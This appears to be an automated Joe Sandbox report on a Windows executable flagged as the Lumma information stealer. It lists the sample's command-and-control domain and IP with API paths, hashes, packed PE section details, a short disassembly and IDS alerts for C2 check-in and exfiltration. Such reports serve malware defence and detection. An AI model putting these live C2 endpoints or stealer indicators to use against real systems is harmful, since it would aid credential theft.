http://crl.rootca1.amazontrust.com/rootca1.crl0 | yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://observerfry.lat/ | yO9EAqDV15.exe, 00000000.00000003.2051214971.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027251253.0000000005F61000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | yO9EAqDV15.exe, 00000000.00000003.2006014483.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | yO9EAqDV15.exe, 00000000.00000003.2006014483.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://observerfry.lat/apiw | yO9EAqDV15.exe, 00000000.00000003.2126425221.00000000017B3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://observerfry.lat:443/apiexe | yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://observerfry.lat/$ | yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://observerfry.lat/d | yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005F94000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.microsof | yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005F94000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | yO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microp; | yO9EAqDV15.exe, 00000000.00000003.2126187612.00000000017F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94 | yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.199.72 | observerfry.lat | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580269
Start date and time: 2024-12-24 08:34:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: yO9EAqDV15.exe (renamed because original name is a hash value)
Original Sample Name: dcbbfbd538d99feec781122f6c905c1b.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target yO9EAqDV15.exe, PID 7412 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:35:33 | API Interceptor | 8x Sleep call for process: yO9EAqDV15.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.199.72 | Collapse.exe | malicious | LummaC
172.67.199.72 | ZysXVT72cl.exe | malicious | LummaC
172.67.199.72 | NAnOVCOt4L.exe | malicious | LummaC
172.67.199.72 | t8cdzT49Yr.exe | malicious | LummaC
172.67.199.72 | zLP3oiwG1g.exe | malicious | LummaC
172.67.199.72 | 0HdDuWzp54.exe | malicious | LummaC, Stealc
172.67.199.72 | NE4jxHLxXJ.exe | malicious | LummaC, Stealc
172.67.199.72 | U8mbM8r793.exe | malicious | LummaC, Stealc
Match | Associated Sample Name / URL | Detection | Threat Name | Context
observerfry.lat | Collapse.exe | malicious | LummaC | 172.67.199.72
observerfry.lat | xlSzrIs5h6.exe | malicious | LummaC, Stealc | 104.21.36.201
observerfry.lat | ZysXVT72cl.exe | malicious | LummaC | 172.67.199.72
observerfry.lat | NxqDwaYpbp.exe | malicious | LummaC | 104.21.36.201
observerfry.lat | NAnOVCOt4L.exe | malicious | LummaC | 172.67.199.72
observerfry.lat | 2jx1O1t486.exe | malicious | LummaC, Stealc | 104.21.36.201
observerfry.lat | OtHVIQ2ge4.exe | malicious | LummaC | 104.21.36.201
observerfry.lat | fr2Mul3G6m.exe | malicious | LummaC | 104.21.36.201
observerfry.lat | t8cdzT49Yr.exe | malicious | LummaC | 172.67.199.72
observerfry.lat | zLP3oiwG1g.exe | malicious | LummaC | 104.21.36.201
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | singl6.mp4.hta | malicious | LummaC | 104.21.37.173
CLOUDFLARENETUS | HALKBANK EKSTRE.exe | malicious | MassLogger RAT | 172.67.177.134
CLOUDFLARENETUS | eMBO6wS1b5.exe | malicious | LummaC Stealer | 172.67.169.205
CLOUDFLARENETUS | qoqD1RxV0F.exe | malicious | LummaC | 172.67.195.241
CLOUDFLARENETUS | txUcQFc0aJ.exe | malicious | LummaC | 172.67.151.61
CLOUDFLARENETUS | hnskdfgjgar22.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
CLOUDFLARENETUS | nabarm5.elf | malicious | Unknown | 8.6.115.225
CLOUDFLARENETUS | nklmips.elf | malicious | Unknown | 104.29.132.180
CLOUDFLARENETUS | eCompleted_419z.pdf | malicious | Unknown | 104.18.95.41
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 172.67.177.88
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | singl6.mp4.hta | malicious | LummaC | 172.67.199.72
a0e9f5d64349fb13191bc781f81f42e1 | eMBO6wS1b5.exe | malicious | LummaC Stealer | 172.67.199.72
a0e9f5d64349fb13191bc781f81f42e1 | qoqD1RxV0F.exe | malicious | LummaC | 172.67.199.72
a0e9f5d64349fb13191bc781f81f42e1 | txUcQFc0aJ.exe | malicious | LummaC | 172.67.199.72
a0e9f5d64349fb13191bc781f81f42e1 | Setup.exe | malicious | LummaC | 172.67.199.72
a0e9f5d64349fb13191bc781f81f42e1 | Adobe GenP 5.exe | malicious | LummaC | 172.67.199.72
a0e9f5d64349fb13191bc781f81f42e1 | Setup_W.exe | malicious | LummaC | 172.67.199.72
a0e9f5d64349fb13191bc781f81f42e1 | iviewers.dll | malicious | LummaC | 172.67.199.72
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC | 172.67.199.72
a0e9f5d64349fb13191bc781f81f42e1 | Collapse.exe | malicious | LummaC | 172.67.199.72
                                                                                                            No context
                                                                                                            No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.947941979248466
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: yO9EAqDV15.exe
File size: 1'884'672 bytes
MD5: dcbbfbd538d99feec781122f6c905c1b
SHA1: 79c4ae40ce7ad4cdb319e7021d21b99f0390725f
SHA256: 08c295782e51777d84b3ab08c49b1d3bedb4126fb88ed9ef47aa81fe8181adea
SHA512: 766b8cdb35ea1ebf3fb19eb76ea257707fd3a2e768fb2aa68a67c20375bd1988b9ba08371c4e3f2941b6ac35987fd2561be6f28b8ab8f97651ee5254c95ff427
SSDEEP: 49152:zlyk8ltRYFManGAwuIGC0oLAegMBu6eiE:hyk81vWjwuICog8de
TLSH: 9C95334BFE1051B2C4469A72ACD25B0E8BBC062C5CB526540F3997BA8F93FFC7352616
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................J...........@...........................J...........@.................................Y@..m..
Icon Hash: 90cececece8e8eb0
                                                                                                            Entrypoint:0x8a8000
                                                                                                            Entrypoint Section:.taggant
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:6
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:6
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:6
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                            Instruction
                                                                                                            jmp 00007F7F08E952BAh
                                                                                                            push fs
                                                                                                            sbb al, 00h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            jmp 00007F7F08E972B5h
                                                                                                            add byte ptr [0000000Ah], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], dh
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax+00000000h], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [esi], al
                                                                                                            add byte ptr [eax], 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            pop es
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], dh
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax+eax], bl
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add dword ptr [eax+00000000h], eax
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add dword ptr [edx], ecx
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            xor byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            or byte ptr [eax+00000000h], al
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            pop es
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], dl
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [edi], al
                                                                                                            or al, byte ptr [eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [esi], al
                                                                                                            add byte ptr [eax], 00000000h
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x52000 | 0x26400 | c91c2d8508283e426924795979ec5bcc | False | 0.9995212928921569 | data | 7.984642934017876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x55000 | 0x2af000 | 0x200 | f63e024bac2a8b939892501bf48d40f6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nhmyvknl | 0x304000 | 0x1a3000 | 0x1a2200 | c31dd1aefa4ba90d92b4a37118030779 | False | 0.994432571935725 | data | 7.953955254723583 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wbokqakx | 0x4a7000 | 0x1000 | 0x400 | 8e6720b9adc964c57d460cada3795509 | False | 0.7490234375 | data | 5.983379105213653 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a8000 | 0x3000 | 0x2200 | a52452e23a7bed6bc90ffe82f5bf97d5 | False | 0.0915670955882353 | DOS executable (COM) | 1.1675038190249605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T08:35:33.462263+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:34.211279+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:34.211279+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:35.436820+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:36.203824+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:36.203824+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:37.820054+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:40.333242+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:42.550856+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:45.127460+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:45.894729+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49735 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:47.664337+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 172.67.199.72 | 443 | TCP
2024-12-24T08:35:52.048837+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49742 | 172.67.199.72 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 08:35:32.238940001 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:32.239023924 CET | 443 | 49730 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:32.239168882 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:32.242435932 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:32.242461920 CET | 443 | 49730 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:33.462084055 CET | 443 | 49730 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:33.462263107 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:33.468462944 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:33.468499899 CET | 443 | 49730 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:33.468854904 CET | 443 | 49730 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:33.517394066 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:33.559871912 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:33.559912920 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:33.560045004 CET | 443 | 49730 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:34.211294889 CET | 443 | 49730 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:34.211385965 CET | 443 | 49730 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:34.211585045 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:34.213630915 CET | 49730 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:34.213659048 CET | 443 | 49730 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:34.223912001 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:34.223962069 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:34.224050045 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:34.225025892 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:34.225044966 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:35.436697960 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:35.436820030 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:35.438590050 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:35.438602924 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:35.439202070 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:35.440536976 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:35.440536976 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:35.440614939 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.203834057 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.203888893 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.203922033 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.203952074 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.203979015 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:36.203982115 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.204021931 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.204041958 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:36.204076052 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:36.206510067 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.214951038 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.214994907 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.215050936 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:36.215081930 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.218718052 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:36.223329067 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.267420053 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:36.323235989 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
Dec 24, 2024 08:35:36.376857996 CET | 49731 | 443 | 192.168.2.4 | 172.67.199.72
Dec 24, 2024 08:35:36.395689964 CET | 443 | 49731 | 172.67.199.72 | 192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.399842978 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.399898052 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.399990082 CET44349731172.67.199.72192.168.2.4
                                                                                                            Dec 24, 2024 08:35:36.400016069 CET49731443192.168.2.4172.67.199.72
                                                                                                            Dec 24, 2024 08:35:36.400069952 CET49731443192.168.2.4172.67.199.72
